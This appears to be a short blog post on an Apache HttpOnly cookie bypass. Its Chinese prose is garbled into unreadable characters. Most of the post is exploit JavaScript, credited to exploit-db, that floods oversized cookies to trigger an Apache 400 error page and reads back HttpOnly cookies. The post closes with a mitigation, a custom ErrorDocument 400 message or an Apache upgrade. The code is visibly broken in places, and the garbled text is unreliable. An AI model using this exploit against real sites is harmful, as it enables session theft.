Apache HttpOnly Cookie XSSվ©
ܶԼһЩҵ߳쿪ԴcmsϵͳΪ˷ֹxssȡûcookie⣬һ㶼øcookiehttponlyԣֱֹʹjsõûcookieӶxssΣպÿƹcookiehttponlyԡchromeһվ㣬F12߹ߣҵconsole´벢س:
// http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
// Construct string for cookie value
var str = "";
for (var i=0; i< 819; i++) {
str += "x";
}
// Set cookies
for (i = 0; i < 10; i++) {
// Expire evil cookie
if (good) {
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
}
// Set evil cookie
else {
var cookie = "xss"+i+"="+str+";path=/";
}
document.cookie = cookie;
}
}
function makeRequest() {
setCookies();
function parseCookies () {
var cookie_dict = {};
// Only react on 400 status
if (xhr.readyState === 4 && xhr.status === 400) {
// Replace newlines and match <pre> content
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
if (content.length) {
// Remove Cookie: prefix
content = content.replace("Cookie: ", "");
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
// Add cookies to object
for (var i=0; i<cookies.length; i++) {
var s_c = cookies.split('=',2);
cookie_dict] = s_c;
}
}
// Unset malicious cookies
setCookies(true);
alert(JSON.stringify(cookie_dict));
}
}
// Make XHR request
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "/", true);
xhr.send(null);
}
makeRequest();
ܿ400cookieϢ
صַhttps://gist.github.com/pilate/1955a1c28324d4724b7b/download#
Apacheٷṩ4ִʽhttp://httpd.apache.org/docs/2.0/mod/core.html#errordocument
In the event of a problem or error, Apachecan be configured to do one of four things,
1. output asimple hardcoded error messageһӲĴϢ
2. output acustomized messageһϢ
3. redirect to alocal URL-path to handle the problem/errorתһصԶҳ
4. redirect to an external URL to handle theproblem/errorתһⲿURL
ԣ400ֻз2Чذٰcookie
Apacheã
ErrorDocument400 " security test"
ȻapacheҲɣ
οhttp://httpd.apache.org/security/vulnerabilities_22.html
ҳ:
[1]